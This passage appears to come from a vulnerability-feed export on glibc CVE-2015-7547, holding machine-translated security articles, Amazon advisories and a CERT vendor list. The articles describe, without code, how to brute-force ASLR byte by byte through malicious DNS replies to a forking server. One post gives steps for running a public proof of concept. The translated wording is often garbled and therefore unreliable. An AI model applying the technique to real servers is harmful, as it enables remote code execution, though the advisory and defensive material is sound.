requests\n3\\. In processing the client request process, sub-process using\"getaddrinfo()\"function to parse the host name. At the same time, it to which DNS server to send DNS requests. \n4\\. The DNS server for the DNS request to make a legitimate response. \n5\\. The sub-process started and has parsed the host connection. \nEach time the main process performed in response to processing, it will own fork a sub-process. According to the foregoing Description, This means that all the child processes share the same memory layout-including load module address. This scene for many services, such as HTTP proxy, email server or DNS servers are very common. \n0x04 attack process example\nIn the implementation of the attack process, we assume that the attacker has to be able to respond to victims of any DNS request capability. To achieve this situation completely by ARP spoofing, DNS spoofing is complete. Attack scenarios the following figure: \n! [](/Article/UploadPic/2017-2/201722018366681. png? www. myhack58. com) \n1\\. An attacker constructs a request is sent to the victim Server\n2\\. In response to the attacker's request, the victim Server daemon fork a child process\n3\\. The sub-process processing request, initiates a DNS request \n4\\. The attacker replies with a malicious DNS response, the response will be a child process of the return address of the cover, and here we set it not 0x12121212 \n5\\. Attacker to obtain sub-process with the connect()function initiates the TCP back connection\nIf 0x12121212 is indeed getaddrinfo()return the correct address, then the process will run normally, and by the connect()initiates a tcp connection. \n! [](/Article/UploadPic/2017-2/201722018366148. png? www. myhack58. com) \nIf this is not the case, and the attacker is the return address is written as any other address, the application will be due to a memory segmentation fault, or execution of an invalid instruction and crashes. \n! [](/Article/UploadPic/2017-2/201722018366410. png? www. myhack58. com) \nThis way you can be judged as an address is getaddrinfo()returns the address of a method, the reason is that if the address is correct, then a TCP connection will be successfully established. Since the module base address in a different sub-process is not random of the previously mentioned common memory layout, so the address in all the sub-processes can be common. An attacker can use this way to go through each possible address, and know the right to establish a TCP connection and get the correct address. \nHowever, using this manner is the base address of the positioning need to guess 2 of the 64-th power of the number of addresses, this is not much practical significance. \nByte-by-byte approach\nHowever, an attacker can each cover only one byte. For example, assume that getaddrinfo returns addresses for 0x00007fff01020304: the \n! [](/Article/UploadPic/2017-2/201722018366285. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-2/201722018366886. png? www. myhack58. com) \nFirst we'll cover the getaddrinfo()function returns the address of the least significant bit LSB of the byte. Here with 0x00 overwritten. Due to the assumption that getaddrinfo()returns addresses for 0x00007fff01020304,the lowest bit coverage is 0x00, then this return address will be changed to 0x00007fff01020300, since the address is illegal address, the function returns after the program will crash. So we continue the above operation is repeated, and each repetition is the LSB only 1 plus that is the first 0x00,the second 0x01,the third 0x02,...when we will be the LSB is increased to 0x04, the getaddrinfo function returns the address to the correct return address 0x00007fff01020304, then the program does not crash, the establishment of a tcp connection. So the lowest bit of the value will be determined. \nNext, we repeat the entire operation, by overwriting the return address of the two bytes 0x04 0x00 to enumerate the next byte, we will return the address of the first byte set to just guess out of the correct bytes 0x04,and so we just need to take the same way to guess the second byte can be. Guess the success of the flag and the first byte of the same, to establish the correct connection. \n\n\n**[1] [[2]](<83590_2.htm>) [next](<83590_2.htm>)**\n", "modified": "2017-02-20T00:00:00", "published": "2017-02-20T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83590.htm", "id": "MYHACK58:62201783590", "type": "myhack58", "title": "How to by CVE-2015-7547(GLIBC getaddrinfo)vulnerability to bypass ASLR-exploits warning-the black bar safety net", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-03-05T05:28:21", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "! [](/Article/UploadPic/2017-3/201735111132310.jpg)\n\n#### 0x01 introduction\n\n2016 2 on 16 May, Google disclosed a critical buffer overflow vulnerability in the GLIBC library in the getaddrinfo function in the trigger. At the same time they also provided a copy of the PoC. Based on this, in this article, we will show how to by CVE-2015-7547 bypass ASLR.\n\n#### 0x02 vulnerability description\n\ngetaddrinfo()function is the role by querying the DNS service, the host name and the server resolves to the addrinfo structure.\n\n! [](/Article/UploadPic/2017-3/201735111133634.jpg)\n\nIn the getaddrinfo()function implementation, use the alloca()function(on the stack allocated buffer)to the DNS response. The beginning, the function first allocates a section of stack space for the DNS response, if the response time is too long, it will re-allocate a heap buffer for the response. But since the update to the code the buffer to the newly allocated heap buffer, stack of old buffer delay in the release, still use. This dangling pointer will cause a classic buffer overflow.\n\n#### ASLR? ASLR!\n\nIn the above case, by this vulnerability cover the getaddrinfo()function's return address, but we should be the return address of the cover to where? When you enable ASLR system, The module address is random. Therefore, the attacker can not be attack stream address is set to the pre-set address.\n\n#### fork()\n\nfork()is Linux create a new process. A typical fork using the method as shown below:\n\n! [](/Article/UploadPic/2017-3/201735111133212.jpg)\n\nfork a child process and the parent process use the same instruction segment, they only have the pid is not the same, and pid is the fork function returns to the child process. And windows under the code multiplexing, the difference is that here means that the child process and its parent processes share many characteristics-have the same register state, stack and memory layout.\n\n#### 0x03 program flow example\n\nConsider a server application, its mode of operation is as follows:\n\n! [](/Article/UploadPic/2017-3/201735111133341.jpg)\n\n1\\. Client remote connection to the application.\n\n2\\. Application your fork a child process for responding to client requests\n\n3\\. In processing the client request process, sub-process using\"getaddrinfo()\"function to parse the host name. At the same time, it to which DNS server to send DNS requests.\n\n4\\. The DNS server for the DNS request to make a legitimate response.\n\n5\\. The sub-process started and has parsed the host connection.\n\nEach time the main process performed in response to processing, it will own fork a sub-process. According to the foregoing Description, This means that all the child processes share the same memory layout-including load module address. This scene for many services(e.g. HTTP proxy, mail server or DNS server)is very common.\n\n#### 0x04 attack process example\n\nIn the implementation of the attack process, we assume that the attacker has to be able to respond to victims of any DNS request capability. To achieve this situation completely by ARP spoofing, DNS spoofing is complete. Attack scenarios the following figure:\n\n! [](/Article/UploadPic/2017-3/201735111133849.jpg)\n\n1\\. An attacker constructs a request is sent to the victim Server\n\n2\\. In response to the attacker's request, the victim Server daemon fork a child process\n\n3\\. The sub-process processing request, initiates a DNS request\n\n4\\. The attacker replies with a malicious DNS response, the response will be a child process of the return address of the cover, and here we set it not 0x12121212\n\n5\\. Attacker to obtain sub-process with the connect()function initiates the TCP back connection\n\nIf 0x12121212 is indeed getaddrinfo()return the correct address, then the process will run normally, and by the connect()initiates a tcp connection.\n\n! [](/Article/UploadPic/2017-3/201735111133519.jpg)\n\nIf this is not the case, and the attacker is the return address is written as any other address, the application will be due to a memory segmentation fault, or execution of an invalid instruction and crashes.\n\n! [](/Article/UploadPic/2017-3/201735111133591.jpg)\n\nThis way you can be judged as an address is getaddrinfo()returns the address of a method, the reason is that if the address is correct, then a TCP connection will be successfully established. Since the module base address in a different sub-process is not randomized(the previously mentioned common memory layout), then this address in all the sub-processes can be common. An attacker can use this way to go through each possible address, and know the right to establish a TCP connection and get the correct address.\n\nHowever, using this manner is the base address of the positioning need to guess 2 of the 64-th power of the number of addresses, this is not much practical significance.\n\n#### Byte-by-byte approach\n\nHowever, an attacker can each cover only one byte. For example, assume that getaddrinfo returns addresses for 0x00007fff01020304: the\n\n! [](/Article/UploadPic/2017-3/201735111133657.jpg)\n\n! [](/Article/UploadPic/2017-3/201735111133920.jpg)\n\nFirst we'll cover the getaddrinfo()function returns the address of the least significant bit(LSB)of the byte. Here with 0x00 overwritten. Due to the assumption that getaddrinfo()returns addresses for 0x00007fff01020304,the lowest bit coverage is 0x00, then this return address will be changed to 0x00007fff01020300, since the address is illegal address, the function returns after the program will crash. So we continue the above operation is repeated, and each repetition is the LSB only plus 1(i.e., the first 0x00,the second 0x01,the third 0x02,...), when we will be the LSB is increased to 0x04, the getaddrinfo function returns the address to the correct return address 0x00007fff01020304, then the program does not crash, the establishment of a tcp connection. So the lowest bit of the value will be determined.\n\n**[1] [[2]](<83974_2.htm>) [next](<83974_2.htm>)**\n", "modified": "2017-03-05T00:00:00", "published": "2017-03-05T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83974.htm", "id": "MYHACK58:62201783974", "type": "myhack58", "title": "How to by CVE-2015-7547(GLIBC getaddrinfo)vulnerability to bypass ASLR-exploits warning-the black bar safety net", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-01T13:01:20", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "Google's security research team recently disclosed a glibc getaddrinfo-overflow vulnerability.\n\nVulnerability details the discovery process can be found in the [Google blog](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html?m=1> a). (Digression, Google engineers are genuine)\n\n## Vulnerability description:\n\nThe vulnerability cause is that the DNS Server Response to return an excess of the(2 0 4 8 ) bytes, leads to the next response trigger stack overflow.\n\nThe vulnerability relies on an oversized (2 0 4 8 bytes) UDP or TCP response, which is followed by another response that will overwrite the stack.\n\n## Impact range:\n\nAll of the Debian family, Red Hat series of Linux distributions, as long as the glibc version is greater than 2. 9 will be affected.\n\nCurrently Google has provided a POC, according to the Google blog, the vulnerability should be able to bypass the memory protection techniques, thereby forming a code execution vulnerability.\n\n## POC using the test\n\nPOC address: [github.com/fjserna/CVE-2015-7547](<http://github.com/fjserna/CVE-2015-7547>)\n\nIn my own local lubuntu for testing, the libc version is 2.19 in. lubuntu series also belong to Debian release version, so in theory, meet the vulnerability criteria.\n\nThe test procedure is as follows:\n\nAccording to the vulnerability Description, We can make a fake DNS Server as an intermediary, to verify the vulnerability.\n\n1. Change DNS to resolve to 127.0.0.1, refresh the DNS cache: sudo /etc/init. d/nscd restart\n2. Execute [CVE-2015-7547-poc.py](<https://github.com/fjserna/CVE-2015-7547/blob/master/CVE-2015-7547-poc.py>) , note that without changing the ip_addr on.\n3. Compile [CVE-2 0 1 5-7 5 4 7-client. c](<https://github.com/fjserna/CVE-2015-7547/blob/master/CVE-2015-7547-client.c>) , execution [CVE-2 0 1 5-7 5 4 7-client](<https://github.com/fjserna/CVE-2015-7547/blob/master/CVE-2015-7547-client.c>)\n\nIf they contain vulnerabilities, it will cause Segmentation Fault.\n\n! [](/Article/UploadPic/2016-2/2 0 1 6 2 1 8 9 3 1 8 2 3 0. png)\n\nDue to the gilbc 2.9 in 2 0 0 8 was released, so a large number of Linux systems are affected by the vulnerability. If once bypass the Memory Protection Technology, the vulnerability can become a big kill. \n\nA hijacked DNS server for MiTM attacks, can be directly in bulk to obtain a large number of host permissions.\n\n## Repair solutions:\n\n1 play patch, refer to the [official introduction](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>)\n\n## References:\n\n**[1] [[2]](<71834_2.htm>) [next](<71834_2.htm>)**\n", "modified": "2016-02-18T00:00:00", "published": "2016-02-18T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/71834.htm", "id": "MYHACK58:62201671834", "type": "myhack58", "title": "Linux, the underlying function library\u201cglibc\u201dreproduction is a major security vulnerability, a plurality of releases affected-vulnerability warning-the black bar safety net", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2020-11-10T12:34:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5229"], "description": "**Issue Overview:**\n\nIt was discovered that the calloc implementation in glibc could return memory areas which contain non-zero bytes. This could result in unexpected application behavior such as hangs or crashes.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-debuginfo-2.17-106.167.amzn1.i686 \n glibc-debuginfo-common-2.17-106.167.amzn1.i686 \n glibc-devel-2.17-106.167.amzn1.i686 \n glibc-headers-2.17-106.167.amzn1.i686 \n nscd-2.17-106.167.amzn1.i686 \n glibc-utils-2.17-106.167.amzn1.i686 \n glibc-2.17-106.167.amzn1.i686 \n glibc-common-2.17-106.167.amzn1.i686 \n glibc-static-2.17-106.167.amzn1.i686 \n \n src: \n glibc-2.17-106.167.amzn1.src \n \n x86_64: \n glibc-2.17-106.167.amzn1.x86_64 \n glibc-static-2.17-106.167.amzn1.x86_64 \n glibc-headers-2.17-106.167.amzn1.x86_64 \n glibc-utils-2.17-106.167.amzn1.x86_64 \n glibc-devel-2.17-106.167.amzn1.x86_64 \n glibc-common-2.17-106.167.amzn1.x86_64 \n glibc-debuginfo-common-2.17-106.167.amzn1.x86_64 \n nscd-2.17-106.167.amzn1.x86_64 \n glibc-debuginfo-2.17-106.167.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-03-10T16:30:00", "published": "2016-03-10T16:30:00", "id": "ALAS-2016-660", "href": "https://alas.aws.amazon.com/ALAS-2016-660.html", "title": "Low: glibc", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-10T12:36:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "**Issue Overview:**\n\nA stack-based buffer overflow flaw was found in the send_dg() and send_vc() functions, used by getaddrinfo() and other higher-level interfaces of glibc. A remote attacker able to cause an application to call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system. Note that you may need to run _yum clean all_ first. Once this update has been applied, _reboot your instance to ensure that all processes and daemons that link against glibc are using the updated version_. On new instance launches prior to Amazon Linux AMI 2015.09.2, you should still reboot after cloud-init has [automatically applied](<https://aws.amazon.com/amazon-linux-ami/faqs/#auto_update>) this update.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-static-2.17-106.166.amzn1.i686 \n glibc-debuginfo-2.17-106.166.amzn1.i686 \n glibc-debuginfo-common-2.17-106.166.amzn1.i686 \n glibc-headers-2.17-106.166.amzn1.i686 \n glibc-2.17-106.166.amzn1.i686 \n glibc-common-2.17-106.166.amzn1.i686 \n glibc-devel-2.17-106.166.amzn1.i686 \n nscd-2.17-106.166.amzn1.i686 \n glibc-utils-2.17-106.166.amzn1.i686 \n \n src: \n glibc-2.17-106.166.amzn1.src \n \n x86_64: \n glibc-devel-2.17-106.166.amzn1.x86_64 \n glibc-utils-2.17-106.166.amzn1.x86_64 \n glibc-2.17-106.166.amzn1.x86_64 \n nscd-2.17-106.166.amzn1.x86_64 \n glibc-debuginfo-2.17-106.166.amzn1.x86_64 \n glibc-debuginfo-common-2.17-106.166.amzn1.x86_64 \n glibc-common-2.17-106.166.amzn1.x86_64 \n glibc-static-2.17-106.166.amzn1.x86_64 \n glibc-headers-2.17-106.166.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-02-16T06:00:00", "published": "2016-02-16T06:00:00", "id": "ALAS-2016-653", "href": "https://alas.aws.amazon.com/ALAS-2016-653.html", "title": "Critical: glibc", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:41:04", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "description": "### Overview \n\nGNU `glibc` contains a buffer overflow vulnerability in the DNS resolver, which may allow a remote attacker to execute arbitrary code.\n\n### Description \n\n[**CWE-121**](<http://cwe.mitre.org/data/definitions/121.html>)**: Stack-based Buffer Overflow - **CVE-2015-7547\n\nAccording to a Google security [blog post](<https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>): \n \n\"The `glibc` DNS client side resolver is vulnerable to a stack-based buffer overflow when the `getaddrinfo()` library function is used. Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack.\" \n \nAccording to `glibc` developers, the vulnerable code was initially added in May 2008 as part of the development for `glibc` 2.9. All versions from 2.9 (originally released November 2008) to 2.22 appear to be affected. \n \nMore details and analysis are available in the [patch announcement](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) from `glibc` developers. \n \n--- \n \n### Impact \n\nThe `getaddrinfo()` function allows a buffer overflow condition in which arbitrary code may be executed. The impact may vary depending on if the use case is local or remote. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nA [patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) for `glibc` is available. Affected users should apply the patch as soon as possible. The patch will also be included as part of the upcoming `glibc` 2.23 release. \n \nThe Vendor Status information below provides more information on updates. \n \n--- \n \n### Vendor Information\n\nSome embedded operating systems or older, no longer supported versions of linux distributions may contain an older version of `glibc` that is vulnerable. Please check with your vendor to find out if you need to upgrade to a newer operating system in order to address this issue. \n \n--- \n \n457759\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Android Open Source Project Affected\n\nNotified: February 17, 2016 Updated: February 23, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arista Networks, Inc. __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"Arista Networks is investigating the applicability of VU#457759 to our products. More information will be available as the investigation proceeds.\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.arista.com/en/support/advisories-notices/security-advisories/1255-security-advisory-17>\n\n### Blue Coat Systems __ Affected\n\nNotified: February 17, 2016 Updated: February 26, 2016 \n\n**Statement Date: February 26, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"Blue Coat products using an affected version of the GNU C Library (glibc) are susceptible to a remote execution attack. A remote attacker can send a crafted DNS response to the glibc DNS resolver and cause the resolver to crash or execute arbitrary code.\"\n\n### Vendor Information \n\nFixes for the vulnerable products are pending. Please see the advisory below.\n\n### Vendor References\n\n * <https://bto.bluecoat.com/security-advisory/sa114>\n\n### CentOS __ Affected\n\nNotified: February 17, 2016 Updated: March 14, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nA patched version of glibc is available for CentOS. The forum discussion at the URL below provides further information.\n\n### Vendor References\n\n * <https://www.centos.org/forums/viewtopic.php?t=56467>\n\n### Cisco __ Affected\n\nNotified: February 17, 2016 Updated: February 18, 2016 \n\n**Statement Date: February 18, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nCisco has provided a security advisory which contains details of which products are affected at the URL below:\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc>\n\n### Debian GNU/Linux __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nDebian has released glibc updates containing the patches. Please see the announcements below:\n\n### Vendor References\n\n * <https://lists.debian.org/debian-security-announce/2016/msg00050.html>\n * <https://lists.debian.org/debian-security-announce/2016/msg00051.html>\n * <https://lists.debian.org/debian-lts-announce/2016/02/msg00009.html>\n\n### GNU glibc __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nA detailed analysis and patch for glibc are available at the URL below.\n\n### Vendor References\n\n * <https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>\n\n### Gentoo Linux __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nglibc has been updated with the patch on Gentoo. Please see the Gentoo security advisory at the URL below.\n\n### Addendum\n\n`<https://security.gentoo.org/glsa/201602-02>`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457759 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nglibc has been updated with the patch. Please see the Red Hat security advisory at the URL below.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2015-7547>\n\n### Ubuntu __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nUbuntu has released a patched version of glibc. Please see the security advisory at the URL below:\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2900-1/>\n\n### EfficientIP __ Not Affected\n\nUpdated: February 18, 2016 \n\n**Statement Date: February 18, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\"`No version of our software is affected by VU#457759 (glibc vulnerable to stack buffer overflow in DNS resolver)`\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: February 17, 2016 Updated: February 22, 2016 \n\n**Statement Date: February 20, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\"Openwall GNU/*/Linux is not affected. We use a fork of a version of glibc predating the introduction of this vulnerability. \n \nWe have previously patched the somewhat related GHOST vulnerability.\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PC-BSD __ Not Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nPC-BSD is based upon FreeBSD, and as such does *not* use glibc by default for any native *BSD applications. As such, it is not vulnerable to CVE-2015-7547. \n \nPC-BSD does allow running Linux applications through emulation, in which case users should ensure their packages / VM's are updated in accordance with upstream methods.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TCPWave __ Not Affected\n\nUpdated: February 18, 2016 \n\n**Statement Date: February 18, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\"The TCPWave DNS Appliances and TCPWave Sharkcage Appliances do not use a vulnerable version of glibc in the current production releases. A newer version that is scheduled for a summer release has been found vulnerable and has been patches. When the customers upgrade the existing appliances to a newer version, they will not be impacted by this vulnerability.\"\n\n### Vendor Information \n\nTCPWave has provided a security advisory at the URL below:\n\n### Vendor References\n\n * <http://www.tcpwave.com/security-advisory-vu457759/>\n\n### ACCESS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### AT&T Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Alcatel-Lucent Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Apple Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Arch Linux Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Aruba Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Avaya, Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Barracuda Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Belkin, Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Brocade Communication Systems Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CA Technologies Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Check Point Software Technologies Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Contiki OS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CoreOS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### D-Link Systems, Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DesktopBSD Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Enterasys Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ericsson Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### European Registry for Internet Domains Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Extreme Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### F5 Networks, Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Force10 Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fortinet, Inc. __ Unknown\n\nNotified: February 17, 2016 Updated: February 29, 2016 \n\n**Statement Date: February 29, 2016**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe following products are confirmed to be **not affected**: \n\n * FortiOS\n * FortiSwitch\n * FortiAnalyzer\nOther products are in the course of being investigated. Please see the URL below for more information and updates. \n\n### Vendor References\n\n * <http://www.fortiguard.com/advisory/glibc-getaddrinfo-stack-overflow>\n\n### Foundry Brocade Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### FreeBSD Project Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### GNU adns Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Google Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hardened BSD Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hewlett Packard Enterprise Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hitachi Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Huawei Technologies Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a 